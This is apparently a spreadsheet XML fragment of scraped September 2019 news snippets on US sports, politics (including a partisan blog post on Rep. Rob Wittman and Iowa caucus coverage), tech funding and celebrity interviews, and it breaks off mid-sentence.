  <si>
    <t>Newcastle United’s board are refusing to panic after the club’s 5-0 thrashing at the hands of Leicester City on Sunday afternoon, and will give Steve Bruce time to get things right on Tyneside, according to Lee Ryder. The Magpies put on a dismal display against the Foxes, but it is understood that those in charge at St. James’ Park are willing to show patience with the... Source</t>
  </si>
  <si>
    <t>Source: http://www.techmeme.com/190916/p25#a190916p25 Crisp, which helps food brands reduce food waste by analyzing data from sources such as inventory databases and POS systems, raises $14.2M Series A (Paul Sawers/VentureBeat) Paul Sawers / VentureBeat: Crisp, which helps food brands reduce food waste by analyzing data from sources such as inventory databases and POS systems, raises $14.2M Series A — “Optimizing output,” or cutting waste, has emerged as something of a micro-trend in the investment realm. Source: http://www.techmeme.com/190916/p25#a190916p25 The post Crisp, which helps food brands reduce food waste by analyzing data from sources such as inventory databases and POS systems, raises $14.2M Series A (Paul Sawers/VentureBeat) appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>WHEN she lived in Sydney, Emma Wills did her meat shopping at Feather and Bone, a shop that buys meat only from regenerative farms raising animals on pasture.</t>
  </si>
  <si>
    <t>Unconfirmed Dirk Nowitzki Tribute Appears In NBA 2K20 Original Source While there has been no formal announcement that the Dallas Mavericks will honor Dirk Nowitzki in this way, the future Hall of Famer’s silhouette has been spotted on the American Airlines Center court in NBA 2K20. The Mavs’ public relations department told me that they couldn’t confirm that the homage would end up on the team’s court in real life and Brad Townsend of the Dallas News didn’t have much better luck when he contacted franchise owner Mark Cuban. Images of the court blew up on Reddit when a Twitter user popular for publishing concept designs, @SkylerInDallas, said that the feature would be included on the team’s new-look home turf. He also included what appears to be an Instagram story screenshot of the court with mats covering where the new Nowitzki silhouette would appear and where the team’s secondary logo appeared last season. The Nowitzki tribute was not included in the batch of leaked court designs that we wrote about last month but neither was the team’s secondary logo. Several of those designs have since been formally confirmed by their franchise’s. Related: The Sixers have revealed they’ll be honoring franchise great Charles Barkley with a statue This wouldn’t be the first time that the design plans of an NBA team have been leaked through a video game but its inclusion in the game doesn’t mean that this will be an official, permanent feature either. Regardless of what the eventual status of this idea is, Cuban and the Mavericks have been vocal about honoring their franchise legend and have already moved to have part of a nearby street renamed to Nowitzki Way. So until we hear official word regarding this one way or another, we’ll continue to hoist jumpers with our 68-rated MyPlayers from the iconic Nowitzki silhouette for as long as 2K lets us. !function(f,b,e,v,n,t,s)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 fbq(‘init’, ‘166515104100547’); fbq(‘track’, ‘PageView’);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Unconfirmed Dirk Nowitzki Tribute Appears In NBA 2K20 appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>U.S. News ranks St. Mary’s second in West for value, top in SA for social mobility Original Source September 13, 2019 For the second year in a row, St. Mary’s University ranked second in the West region in the Best Value Schools rankings by U.S. News &amp; World Report, which this week released the 2020 edition of its annual Best Colleges guide. This category uses a calculation that takes into account the school’s academic quality (based on its U.S. News Best Colleges ranking) and several cost factors, which include the 2018-2019 net cost of attendance for a student receiving an average level of need-based financial aid. “The higher the quality of the program and the lower the cost, the better the deal,” according to the publication. St. Mary’s ranking in the 2020 Best Colleges ranking rose to tie for the 10th spot out of 128 universities in the West for academic quality, especially student outcomes. The University has been included in the list of top-tier regional universities for 26 consecutive years. More rankings U.S. News introduced a new ranking for Top Performers on Social Mobility this year to evaluate which schools best serve underrepresented students. This ranking measures how successful colleges are at “advancing social mobility by enrolling and graduating large proportions of disadvantaged students awarded with Pell Grants.” Most students receiving these grants have adjusted gross family incomes under $50,000. St. Mary’s tied for No. 22 in the West and ranked first in San Antonio in this analysis. This year, St. Mary’s also rose to tie 6th among the Best Colleges for Veterans in the West, which includes schools that take part in federal initiatives to aid veterans and active-duty service members in funding their education. St. Mary’s University is a Yellow Ribbon School. U.S. News also ranked the University’s Engineering program. Money Magazine also recently ranked St. Mary’s the top Catholic university in the Southwest, No. 7 in Texas and No. 26 of Catholic institutions in U.S. For more information, visit the St. Mary’s University honors and rankings page.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U.S. News ranks St. Mary’s second in West for value, top in SA for social mobility appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Charles LeClaire-USA TODAY Sports Time to check on the latest news surrounding the Pittsburgh Steelers. The Pittsburgh Steelers are moving into Week 3 of the NFL regular season, and as the team prepares for the San Francisco 49ers, we continue to provide you with features, commentary and opinions to tide you over until the season starts! Today in the black-and-gold links article we take a look at Let’s get to the news: Mason Rudolph has the opportunity of a lifetime, getting 14 games to show what you have for the team that drafted you. If only it didn’t take Ben Roethlisberger’s elbow going out to get this opportunity. Mason Rudolph gets opportunity to lead Steelers offense By: Chris Adamski, Pittsburgh Tribune-Review “It’s a crazy turn of events with an injury, but I’m excited to step up,” Rudolph said. “That’s what backups do. That’s what I’ve done my entire career, whether it be high school, college or now. Nothing different for me. I’m going to be the same person I am and continue to prepare like I’m the starter when I’m not, and I’m going to continue to do that: do my weekly routine and put a good gameplan together with the staff and go execute.” Rudolph was lumped into what some were calling a historically deep and quality quarterbacks class in 2018 alongside Baker Mayfield, Sam Darnold, Josh Allen, Josh Rosen and Lamar Jackson. But when the dust cleared on that draft, those five went in the first round (all but Jackson being taken in the top 10) – and Rudolph waited until the middle of the third round to be picked up by the Steelers. That the Steelers had a first-round grade on Rudolph — and they traded up three spots to grab him — was of little consolation to him, mostly because of the circumstance. With Roethlisberger, the Steelers had a franchise quarterback in place. To read the full article, click HERE (Free) The loss of Ben Roethlisberger starts a shift for the Steelers, whether you like it or not… Kevin Gorman: Losing Ben Roethlisberger for the season is seismic shift for Steelers By: Kevin Gorman, Pittsburgh Tribune-Review Before Ben Roethlisberger clutched his right elbow Sunday, the Pittsburgh Steelers were aware their franchise quarterback was experiencing pain in his passing arm. But they trusted in his threshold. “I don’t think anyone was too worried about it,” right guard David DeCastro said. “You know Ben. Ben’s going to come out and play.” When Roethlisberger didn’t come out to play the second half against the Seattle Seahawks, the Steelers were too emotionally invested in trying to win the game with backup Mason Rudolph to worry about Big Ben’s fate, let alone his future. But they understood the consequences. “Ben’s, obviously, tough as can be, and we’ve seen him come back from stuff,” wide receiver Ryan Switzer said. “When we found out he wasn’t, we figured it was probably serious.” So it was a stunning scene Monday inside their locker room, just 90 minutes after the Steelers announced Roethlisberger’s injury requires surgery that will end his season. And, given he is 37, quite possibly his Hall of Fame career. “It’s super weird, that’s for sure,” DeCastro said. “It’s really surreal. But, at the same time, you’ve got to have that football player mentality: next guy up and move on. But, obviously, with a guy like that, it’s a little different, easier said than done.” To read the full article, click HERE (Free) Was the Steelers trade for Minkah Fitzpatrick a desperation move? Steelers’ move for Minkah Fitzpatrick bold, calculated — and a bit desperate By: Jeremy Fowler, ESPN On the surface, the Pittsburgh Steelers’ decision to deal a first-round pick to the Miami Dolphins for safety Minkah Fitzpatrick reeks of desperation. They are 0-2, just lost their franchise quarterback for the year and see the Super Bowl window closing fast. The stage was set for Pittsburgh to get a high pick in 2020. But the Steelers have never done business with draft positioning in mind. Win now is always the culture. The Steelers feel strongly enough about Fitzpatrick’s talent — and affordable rookie contract with an average base salary of $2.1 million for the next three seasons — to justify any pick the team could muster in April’s draft. The move says a lot about where the Steelers are, and where they will be: To read the full article, click HERE (Free) Mason Rudolph’s Media Session .@Rudolph2Mason speaks about assuming the role of starting quarterback for the remainder of the season. pic.twitter.com/acBjQRuR2S — Pittsburgh Steelers (@steelers) September 16, 2019 Social Media Madness .@missi_matthews and @TunchIlkin break down Mason Rudolph’s performance vs. the Seahawks. pic.twitter.com/PjzfOT1RTH — Pittsburgh Steelers (@steelers) September 16, 2019 David DeCastro, JuJu Smith-Schuster, and James Washington talk about Ben Roethlisberger’s injury and their confidence in Mason Rudolph. pic.twitter.com/kdhflyY3GA — Pittsburgh Steelers (@steelers) September 17, 2019 Jaylen Samuels, Ryan Switzer &amp; Cameron Heyward speak about Ben Roethlisberger. pic.twitter.com/TFb1LIW29L — Pittsburgh Steelers (@steelers) September 16, 2019 #ICYMI: The @steelers honored two #WWII @USArmy veterans – brothers Ted, 99, and Ed Sikora, 95 at yesterday’s home opener. #NFL #KnowYourMil #DoDRemembers75. pic.twitter.com/APEAQrrwA4 — U.S. Dept of Defense (@DeptofDefense) September 16, 2019</t>
  </si>
  <si>
    <t>"Blast Off" EP available to stream/buy: ➘ Store: https://www.beatport.com/release/blast-off-ep/2710368 "Blast Off" EP 01. iBenji &amp; Shiiru - Blast Off (feat. T3arz) 02. iBenji - Model 315 03. iBenji - Shinobi 04. iBenji - Flow → iBenji http://www.facebook.com/ibenjimusic http://www.instagram.com/ibenjimusic → Shiiru https://www.facebook.com/shiirumusic/ Tweets by shiiru_ → Othercide http://www.facebook.com/otherciderecords Tweets by Othercide http://www.youtube.com/user/othercideTV http://www.instagram.com/otherciderecords/ → The Dub […] The post iBenji &amp; Shiiru – Blast Off (feat. T3arz) appeared first on Dubster.</t>
  </si>
  <si>
    <t>Artificial intelligence may be able to help auto insurers convince regulators to relax certain prohibitions on rate restrictions, the founder of an A.I. vendor suggests. In Ontario, insurers are prohibited from using several factors – such as certain at-fault accidents,… The post One way to convince regulators to relax auto rate rules appeared first on Canadian Underwriter.</t>
  </si>
  <si>
    <t>Welcome to the daily Tech Support thread for /r/Apple. Have a question you need answered? Ask away! Please remember to adhere to our rul... Daily Tech Support Thread - [September 25]</t>
  </si>
  <si>
    <t>Sarah Keoghan</t>
  </si>
  <si>
    <t>A woman has been stabbed in Marrickville overnight, with police at a loss as to why the violent incident took place.</t>
  </si>
  <si>
    <t>by Lowell Here are a few national and Virginia news headlines, political and otherwise, for Wednesday, September 11. Scottish court rules Johnson’s suspension of Britain’s Parliament was illegal (“The ruling does not mean Parliament will immediately come back into session. But it does give the prime minister’s opponents hope ahead of a Supreme Court case next week. In an earlier ruling last week, judges had declined to challenge the legality of the suspension.”) Trump’s trade war has killed 300,000 jobs John Bolton’s turbulent tenure comes to a Trumpian end Trump Ousts John Bolton as National Security Adviser As frustration with Bolton mounted, Trump reached out to ex-adviser McMaster Speak Up, John Bolton (“The national-security professionals who have left this administration owe the American people the truth about the president.”) How John Bolton Broke the National Security Council (“He weakened one of the few constraints that kept Trump from running foreign policy by the seat of his pants.”) John Bolton left because Trump wouldn’t let him start a war John Bolton Will Hold This Grudge (“His dismissal by tweet came after an unusually long prelude of disrespect, both by President Trump and by favored allies.”) Why John Bolton had to leave and what to expect next “Everyone Should Be Concerned”: With Bolton Out, Trump’s National Security Council Is Thrust Back Into Chaos (“Insiders weren’t surprised that the odd-couple marriage didn’t work out. Still, Bolton’s departure creates a power vacuum inside the White House—and makes it even harder for the president to respond to a crisis. “We’ve shredded pretty much every trace of collegial interagency cooperation in foreign policy,” says a former top U.S. official. “Trump is now doing just about everything out of his hip pocket.”) The Padded Room Wasn’t Big Enough for Both Donald Trump and John Bolton (“The warmongering charlatan has been 86’d from Camp Runamuck by way of Twitter.”) John Bolton Goes Down With the Ship (“The United States — with the largest military and intelligence establishments the world has ever seen, diplomats abroad in 290-some missions and troops in more than 150 countries, embroiled in a trade war with its main peer competitor and many of its own allies — currently has no effective mechanism to coordinate its actions. Let that sink in. “) What John Bolton’s Ouster Says About Donald Trump (“No matter who advises this president, chaos will reign”) John Bolton’s legacy: Chaos, dysfunction and no meaningful accomplishments Bolton is out, proving blind loyalty to a narcissist never works Bolton lost the latest Trump administration factional battle, but not the last Why Republicans shouldn’t breathe a sigh of relief after N.C. win (“Republicans held onto a district Trump carried by 12 points in 2016, while Democrats’ sagging rural performance also drew notice.”) Republicans Won Both Elections In North Carolina — But It’s Not All Bad News For Democrats (“But there was also a silver lining for Democrats — their final vote margin in the night’s marquee race was much bluer than the district’s baseline partisanship.”) Republican Bishop pulls out narrow win in N.C. House race (Of course, would have loved the win, but that’s not an impressive victory at all for the Republican in this district that’s got a Partisan Voting Index of R+8) Wilbur Ross’s threat to fire NOAA officials over a tweet turns Sharpiegate into a real scandal (“Ross threatened to fire officials if they didn’t back an incorrect tweet sent by President Trump.”) Share Of Uninsured Americans Rises For 1st Time In A Decade (“The Census report found that 27.5 million people, 8.5% of the population, lacked health insurance coverage in 2018.” Thanks, Trump.) Fox News has basically ignored stories related to Trump’s corruption (“Both the ‘news’ and opinion sides at Fox downplay or ignore stories about Wilbur Ross, the NOAA, and government officials staying at Trump properties”) The Republican Party Is (Probably) Not Doomed Fox News has spent months demonizing homelessness in California. Now Trump wants a major crackdown. GOP congressman claims Trump’s record deficit is somehow Pelosi’s fault This is how the Trump administration quietly incapacitates the government (“But while everybody was watching those fireworks, Trump’s underlings — some far more competent than he — were toiling in the shadows to hand over public lands to the tender mercies of oil and gas companies.”) Warren Continues to Emerge As a Potential Democratic Unity Figure ThinkProgress to Be Archived After Union Threatens ‘Legal Options’ Against CAP (“The recently closed progressive news site will no longer exist as a sounding board for think tank scholars after union complaints.” What a fiasco.) Invasive Vines Are Trying To Take Control Of Mid-Atlantic Parks — And It Looks Like They’re Winning (“Park managers, nonprofits and volunteers have been fighting the invaders for decades. But it’s a battle to just hold the line.”) Team Biden beats the press (“The vice president’s allies say neither detractors in the media, nor his rivals on the stump, understand the root of his appeal.”) Judge Promoted by Trump Administration Threatened a 2-Year-Old With an Attack Dog (Sick.) NBC News wanted a part of the Russian spy story. So it did something really stupid. California passes landmark gig economy workers’ rights bill (“Law would make it more difficult for firms such as Uber to deny workers are employees”) She Fled the 68th Floor. She’s Finally Dealing With 9/11 Trauma. The Continuing Legacy of 9/11 AG Mark Herring and Bipartisan Coalition Investigating Google for Potential Antitrust Violations CNU Prof. Rachel Bitecofer: “Hard to Imagine a Scenario” in Which Virginia Dems Don’t Take Back House of Delegates Audio: With 56 Days to Go Until They Lose Their Majority, Panic-Stricken Virginia House Republicans Ratchet Up Hysteria, Fear-Mongering to DEFCON 1 PAC to spend $500,000 to help Democrats running for Virginia House (“Forward Majority’s donation comes on top of other big donations from national Democratic groups.”) DLCC Launches New @DLCCPress Twitter Account, Virginia GOP Hall of Shame Clean Virginia: Dominion Asks Regulators to Ignore the Voices of Virginian Customers and Legislators in Boosting its Profits UVa promises changes after report on medical debt collection (“Changes to collections processes may not impact the fees charged for emergency care and chronic conditions, and outstanding fees can also affect university students’ classes.”) I got a Virginia concealed-carry permit. No one made me prove I actually can fire a gun and hit a target. Virginia’s poverty rate drops to 10.1%, new data show Pamunkey casino deal could mean nearly $33 million annually for Norfolk Liberty University’s Jerry Falwell Jr. says he was target of ‘attempted coup’ related to Trump, asks for FBI probe (What the…?) After handing over documents on Coliseum plans, Stoney administration appeals Goldman FOIA decision to Virginia Supreme Court A Virginia seminary is the first school to create a reparations fund (“Virginia Theological Seminary used enslaved labor. Now it is spending $1.7 million on reparations.”) Slaves helped build Virginia Theological Seminary. The school will spend $1.7 million in reparations. Dan Helmer looks to help Democrats take the Virginia House. Here’s what he said about our issues. ‘This matters’: Loudoun County confronts racism in its schools Two weeks after Virginia Beach’s city manager resigned, the council talks about building trust Richmond City Council symbolically bans conversion therapy Chesterfield parents rally outside School Board meeting to protest Legionella, mold conditions Summer surges back today and tomorrow; a few chances of showers and storms through the weekend</t>
  </si>
  <si>
    <t>‘I was lying on the floor crying’ – Emile Heskey opens up on six months of depression following Liverpool move Original Source The former England striker has discussed his struggles with mental health after leaving his hometown for Merseyside Emile Heskey has opened up on his battle with depression following his move from Leicester City to Liverpool. He joined the Reds in 2000, five years after making his debut for hometown club Leicester City, becoming Liverpool’s record signing at the time. Heskey went on to win several trophies at the club in the most successful spell of his career as a footballer, but he initially struggled with homesickness after arriving on Merseyside. Editors’ Picks “It lasted six months,” Heskey told The Guardian. “I had to grow up very quickly because I had kids, I had a girlfriend. I literally laid on the floor and started crying. I was like, ‘What have I done? I don’t know if I have done the right thing’. But the weirdest thing was I’d go to training [and] I would be all right. “Then like a drop of a hat I found a barber, I found friends, a routine. Yes, it was a tough time but it was weird, I was silly and looking back you think, ‘Why didn’t you just go and sit with mates?’” The former England striker also brushed off criticism of his strike-rate, having scored 111 Premier League goals from 516 appearances, while notching 60 in all competitions for Liverpool from 223 games. Article continues below “I play for the team; it wasn’t anything that really bothered me,” Heskey continued. “I know [some] forwards will go out and if [the team] score five and they don’t, they are fuming. I don’t care. I still got to the top 1 per cent or whatever of the game. “Your son is eight. So if I tell you by the age of 24 he would’ve represented England youth all the way through, would have made his debut at 17 and gone to three cup finals in four years for his hometown team, then been sold for a record to Liverpool – one of the biggest clubs in the world; then he’d go on to win the treble [FA Cup, League Cup, UEFA Cup] that first season, represent England at two World Cups, in the European Championships, and play in one of England’s most memorable games to date, winning God knows, six or seven trophies by the age of 24, how would you feel?”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‘I was lying on the floor crying’ – Emile Heskey opens up on six months of depression following Liverpool move appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>⏩ SUBSCRIBE http://bit.ly/yt-reggaeville ✅ Log on https://www.REGGAEVILLE.com 🔔 GET NOTIFIED about new videos! Vinyllionaires Club Riddim by Giddimani Records #ReggaevilleVideoPremiere #MaadSickReggaeville #Reggaeville The post Greg Roy – Roots [Official Video 2019] appeared first on Dubster.</t>
  </si>
  <si>
    <t>The WeWork co-founder agreed on Tuesday to resign and give up majority voting control, after SoftBank and other shareholders turned on him</t>
  </si>
  <si>
    <t>South Bend mayor says what? Via Jewish Insider: ELKADER, IOWA — Presidential hopeful Pete Buttigieg said he had moral qualms about being a college football fan and found it “problematic” on Monday. In response to a question from Jewish Insider about the issues with following a sport where unpaid athletes risk serious injury, Buttigieg said, […]</t>
  </si>
  <si>
    <t>Francois G. Durand via Getty Images Salma Hayek poses with her daughter, Valentina Paloma Pinault, and her husband, Francois-Henri Pinault, in 2012. Salma Hayek has many thoughts about the often indescribable experience of being a parent. The actor and her husband, François-Henri Pinault, welcomed their daughter, Valentina, in 2007. Since becoming a mother, she has opened up about her parenting journey in several interviews. In honor of her birthday, here are 13 quotes about motherhood from Hayek. On Becoming A Mom At 41 “I think I’m a better mother because I had her later. But I do get tired. I’m not going to lie.” On Pregnancy Issues “I got gestational diabetes, which I didn’t realize at first. It occurs in women who have high blood sugar levels during pregnancy. I didn’t know whether I was feeling bad because I was pregnant or whether something was seriously wrong. I was nauseated for nine months, which can be one of the symptoms. If I had it to do over again, I wouldn’t eat so much fruit at the beginning. I didn’t know that eating fruit that is high in sugar is not recommended when you have gestational diabetes. But you know what? At least I had fruit. In a lot of countries, they don’t have these kinds of choices.” On Her Life As A Parent “I love being a wife and homemaker ― because it’s my choice. My friends who don’t have children say it’s impossible to get together with me because I don’t want to talk about anything else except motherhood. But being a mother is more exhausting than working, and sometimes I push myself too hard and burn myself out. I can appreciate how exhausting it must be for women who have to do everything themselves all the time.” On Being Present “I try to be with Valentina as much as possible, even when I’m working. She was with me on the cover shoot and she felt like a participant ― she wasn’t just sitting there on the iPad. This is so important. You have to drag children into participating in life. It takes a lot of work and mummies are very tired because most of us work and life is exhausting, especially if you are an older mom like me, but you have to make the effort. And if you have a smart child, it’s harder. Now it’s so easy to just entertain them (with a screen), and you don’t have to go through the complaining for an hour about dragging them places. Drag them, and make them a part of your life. It’s about the human connection, and the things they can learn from participating in life. Otherwise, isolation starts to happen.” On Her Daughter’s Different Upbringing “I don’t say the sort of things to Valentina that my mom said to me because her life is different. [She’s] growing up in different circumstances. What my mom taught me was very important to me, but I don’t pass that on to my daughter because she needs the opposite.” On The Early Days Of Motherhood “Pregnancy is all a blur now. But I remember the advice that my aunt gave me ― my aunt who never had any babies. She spent some time with us when Valentina was not even 1 month old, and she said to me, ‘Put her to sleep yourself every night. Sing to her and cradle her in your arms and sit by her side ― every night. Because one day, you won’t be able to carry her anymore, and it’s going to happen really fast.’” On Perspective “I was ignorant when I was pregnant, and that was a weird sensation, not knowing what was good for my body and what was bad. … People are giving birth in Third World countries and performing rituals that have been passed down to them, such as sealing the umbilical cord with dirt ― but tetanus enters the area, and both the mother and baby die soon after. So anything that I could complain about in my own pregnancy seems silly. I have a beautiful, healthy baby, and it just makes me more aware of the threats that mothers and babies in other countries face.” On Her Daughter “Valentina and I are not very similar personality-wise. But she doesn’t have stage fright on camera. In my family, everyone is very confident, graceful and light. Valentina and I are the ones who panic on stage. But she gets in front of the camera with no problem!” On Marriage And Motherhood “Sometimes the hardest things to balance is motherhood with marriage. They take over, oh my God, they take over everything. You just have to remind yourself that you have that other big kid too to look after. He looks like he’s self-sufficient, but they need the tender loving care too. You have to keep reminding yourself.” On Taking Care Of A Living Being “Every woman has a maternal instinct inside and I think that it’s important that all humans try to have that experience and apply that maternal instinct to some living creature. You don’t have to have children, but be responsible and take care of animals or a plant. Take care of another being. Feeling responsible helps you develop as a human being. It doesn’t have to be a sacrifice but an intention that you give of yourself, and contribute to another living being’s life. That’s very rewarding. You learn a lot about yourself when you do something for someone else.” On Her Yearning To Have Children “I had a child late in life. In ‘Tale Of Tales,’ I identified with my character’s desperate desire to have a child, and maybe feeling that you could never be happy or complete, that your life is not complete, without this. I’ve had that yearning, that longing, and that pain. … I always wanted to have a lot of children, and I was not able to. My body, as a miracle, had one. The huge blessing I’ve had is that my husband has three other children. So I have four. And they are all so different.” On Work-Life Balance “When it comes to my career, what I do is I only do roles that are shot in a way that I’m never more than two weeks away from my family.” On The Power Of Parenthood “People always say about having a child, ‘You’ve never loved anyone so much. It’s like nothing you’ve ever felt. You’ll love her so much, you won’t be able to sleep.’ My reaction was analytical; I was like, ‘Okay, yes, I understand that.’ But unless you experience it, you cannot understand what they’re talking about. I thought I understood. But I didn’t. It’s a kind of love that’s just unique to this experience!” Source link</t>
  </si>
  <si>
    <t>Canal Futur: Channel is back (Rascom QAF 1R 3.0E, 2019-09-16 09:58)… KingOfSat News The post Canal Futur: Channel is back (Rascom QAF 1R) appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>NBA can’t stop my contract demands Original Source Spencer Dinwiddie expects his plan to monetize part of his contract into a digital investment vehicle will go through, with the NBA and Players Association approving it. Or more accurately, the Nets guard is confident they can’t stop it. Dinwiddie will in essence sell bonds in himself to raise funds. The Players Association had no comment on Dinwiddie’s plans, and there have been questions about whether it could face long, drawn-out scrutiny from the league, although Dinwiddie wasn’t expecting it. “What are they going to do, try and stop me? I mean, they could try,” Dinwiddie said. “Then they’d have to have legal standing to do so. Do you really want to do that? Because wouldn’t that be bad PR for them to do that? I would think. Then I’d start to look like [Colin] Kaepernick. “Nothing I’m doing is illegal. I know there’s a lot of misinformation out there, like I’m trying to create a currency or something. I’m not trying to reinvent the wheel and create a new bitcoin; this is different. … I will say this, though: It solves some of the league’s fan engagement issue. It does do that.” Dinwiddie — who was instrumental in recruiting Kyrie Irving, who in turn helped lure Kevin Durant to Brooklyn — was clearly amused by the NBA’s sudden new stance on tampering reform. The irony isn’t lost on him that the reforms came when the NBA’s second sons like the Nets and Clippers cleaned up in free agency. “You mean when non-traditional powers like the Nets and the Clippers win?” Dinwiddie laughed. “What you’re saying is, if it’d been the Lakers and the Knicks that won it wouldn’t be a problem, but because it’s the Clippers and the Nets that won it’s an issue? You said it, not me.” The Nets unveiled a redesign of their home court at Barclays Center on Monday. The colors — weathered wood and concrete gray — represent playground courts and Brooklyn’s industrial foundation. At this point last season, the Nets were buzzing over the strides Caris LeVert had made. Now Dinwiddie tabbed newcomer Taurean Prince as the most likely to take a leap forward. “He’s going to be a pleasant surprise, somebody a lot of people are discounting,” Dinwiddie said of Prince , who has shot 39 and 38.5 from 3 the past two years. “[He] can really, really, really shoot it.” Spencer DinwiddieCorey Sipkin The Nets got the rights to Deng Adel and JaKaar Sampson in a three-way deal that cost them the returning rights to J.J. Moore and Milton Doyle. Brooklyn inked Adel to an Exhibit 10 contract back in July, but now if he gets cut he’ll go to G-League Long Island as a returning player. Sampson, who has played 178 NBA games, is currently on the books with Indiana. If the Pacers cut him, his G-League rights go to Long Island. The Nets haven’t commented on Rodions Kurucs after the Latvian got charged with assault. Both Dzanan Musa — his best friend on the team — and Dinwiddie declined to talk specifics but stood by Kurucs. Brooklyn promoted Tiago Splitter to player development coach and Ryan Forehan-Kelly took the role of player development coordinator. They added J.R. Holden as director of player personnel and Daniel Jones as physical performance coach.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NBA can’t stop my contract demands appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Among the delusional, alternative-reality, right-wing Republicans in Congress, Virginia has a few real doozies. One of those is Rep. Rob Wittman (R-VA01), who is basically terrible on every issue, who votes with the Orange Dotard 92% of the time, and who frequently spews nonsense and hypocritical b.s. So now, with new jobs numbers out this morning, Wittman just told a series of whoppers about the economy on right-wing talk radio. Here’s what Wittman claimed in 16 seconds of lying, and what the verifiable *facts* actually are. First, Wittman claimed “wage growth which is fantastic.” In fact, as the following graphic clearly demonstrates – and as Heidi Shierholz, former Chief Economist at the US Dept. of Labor, clearly explains – “From late 2017 through late 2018, it looked like wage growth was picking up. THAT ENDED. Wage growth is flat this year.” In other words, Trump inherited a strong Obama economy, poured massive tax cuts (which ballooned the deficit and debt) on top of it, and wage growth *might have* picked up a bit, temporarily. But now that the “sugar high” of the tax-cuts-for-the-1% have largely faded out? Yep, wage growth has settled back down. Yet Wittman claims wage growth’s “fantastic.” More like Wittman lives in a fantasticAL world, in which he lives in an “alternative facts”/right-wing media echo chamber. A reminder: From late 2017 through late 2018, it looked like wage growth was picking up. THAT ENDED. Wage growth is flat this year. #JobsReport #WagesReport pic.twitter.com/pbTtviePCX — Heidi Shierholz (@hshierholz) September 6, 2019 Next, Wittman asserted (falsely) that there’s a “record number of jobs being created.” That’s just wildly, demonstrably, verifiably a lie. In fact, as the following table shows, job growth during the last four months under President Obama was 191,000, compared to just 132,000 during the last four months under Trump. And again, note that this anemic jobs growth comes in SPITE OF the fact that Trump inherited a strong, structurally sound economy from President Obama. Which, of course, Trump is now in the process of f***ing up, just like he f***ed up everything else in his life. Average Monthly Job Growth Last four months under Obama: 191,000 Last four months under Trump: 132,000#JobsReporthttps://t.co/kVDu6AQb4n pic.twitter.com/29wcJB7ROF — Keith Boykin (@keithboykin) September 6, 2019 Last but…ok, least, Wittman argued that “if you look at polling in people’s attitudes towards the economy, consumer confidence is at a record high.” In fact, consumer confidence just fell by the most in one month since 2012 (!), “to 89.8 in August from a previously reported 92.1 and 98.4 in July.” Great, eh? Also, a Quinnipiac University poll in late August found that, “For the first time since Mr. Trump won the presidency in 2016, more registered voters say the country’s economy is getting worse than say it’s getting better…37% say the economy is getting worse, compared with 31% who say it’s getting better and 30% who say it’s staying the same.” Yet in Wittman’s warped world, consumer confidence is supposedly “at a record high.” The bottom line is that Rob Wittman either has no clue what he’s talking about, or he *does* know the facts but chooses to spew out falsehoods anyway. Either way, VA01 voters definitely need to replace him in November 2020.</t>
  </si>
  <si>
    <t>Veteran pitcher Justin Verlander no-hit the Blue Jays in Toronto for the second time in eight years on Sunday, leading the Houston Astros to a 2-0 win and series victory. CBC | Sports News Astros veteran Justin Verlander no-hits young Blue Jays, striking out 14</t>
  </si>
  <si>
    <t>It took German striker Alexander Meier a matter of hours to answer the call of Western Sydney, and now the former Bundesliga Golden Boot winner is ready to play a leading role in a Wanderers revival.</t>
  </si>
  <si>
    <t>Nick Galvin</t>
  </si>
  <si>
    <t>Sydney Morning Herald photographer Dominic Lorrimer has won the $10,000 Australian Life photography prize for a deeply emotional image entitled Haka.</t>
  </si>
  <si>
    <t>WEBSTER CITY, Iowa — Iowa’s presidential caucuses disenfranchise huge blocs of voters. The state is 91 percent white. It is not easy to get to, or get around in. But to a greater degree than in recent campaigns, this unrepresentative and idiosyncratic state is proving that it is the only electoral battleground that matters for Democrats from now until caucus night on Feb. 3. Former Vice President Joseph R. Biden Jr.’s campaign said it would have 110 staff members in the state by the end of this month. Senator Kamala Harris has promised to visit every week in October. Mayor Pete Buttigieg on Sunday kicked off a John McCain-like, everything-on-the-record bus tour and is advertising on local television and radio. Senator Amy Klobuchar is 49 counties into her tour of all 99 in the state. And on Monday, Senator Bernie Sanders will begin a “Bernie Beats Trump’’ tour of eastern Iowa to highlight what he says is his strength as a general election candidate. As a new poll suggested a significant shift in the primary race’s top tier — with Senator Elizabeth Warren overtaking Mr. Biden for first place — candidates at the annual Polk County Steak Fry in Des Moines on Saturday tried to cut through the furor surrounding President Trump, Ukraine and Mr. Biden to deliver their message to voters still sifting through their preferences from one of the largest fields in history. The candidates’ renewed sense of urgency has set the stage for a four-month sprint to a night of caucuses that remains the single biggest prize in American politics. “We know that Iowa is where we can turn heads,’’ Mr. Buttigieg, of South Bend, Ind., said aboard his campaign bus on Sunday. “Even the other early states will be looking at what Iowa did.” The increasing focus on Iowa, where voters must attend an hourslong midwinter evening gathering to participate in choosing their party’s nominee, has come at the expense of New Hampshire, where the nation’s first primary election comes eight days later. None of the Democratic presidential candidates are betting their entire campaigns on a strong performance in New Hampshire, meaning it may be the first time since 1984 that there is not a candidate focused solely on the Granite State in a contested presidential race. With so many candidates running, much remains unsettled. And both Iowa and New Hampshire have a history of lifting underdog candidates, with John Kerry rising from the single digits to a caucus victory in 2004 and Bill Clinton declaring himself the “comeback kid” when he finished second in New Hampshire’s 1992 primary contest. Yet those examples, like others often cited by this year’s back-of-the-pack candidates, took place before presidential campaigns had become entirely nationalized. Nowadays, Democrats at campaign rallies in rural Iowa are more likely to recite talking points they have heard on cable news or social media than something they read in their local newspaper. Collectively, the 10 Democrats who appeared on the debate stage in Houston this month have spent more than twice as much money on Facebook advertisements targeted to Iowans since June 29 than to people in New Hampshire, Nevada or South Carolina, according to data from Bully Pulpit Interactive, a Democratic political firm. No candidate in the race has a bigger chasm between online investments in the first two nominating states than Ms. Harris, of California, who since June 29 has spent $115,178 on Facebook ads in Iowa, but just $2,164 on such ads in New Hampshire. After some grumbling that she had gone more than a month since last visiting the state, Ms. Harris was overheard last week saying she was “moving to Iowa,” with an expletive added for emphasis. Her team 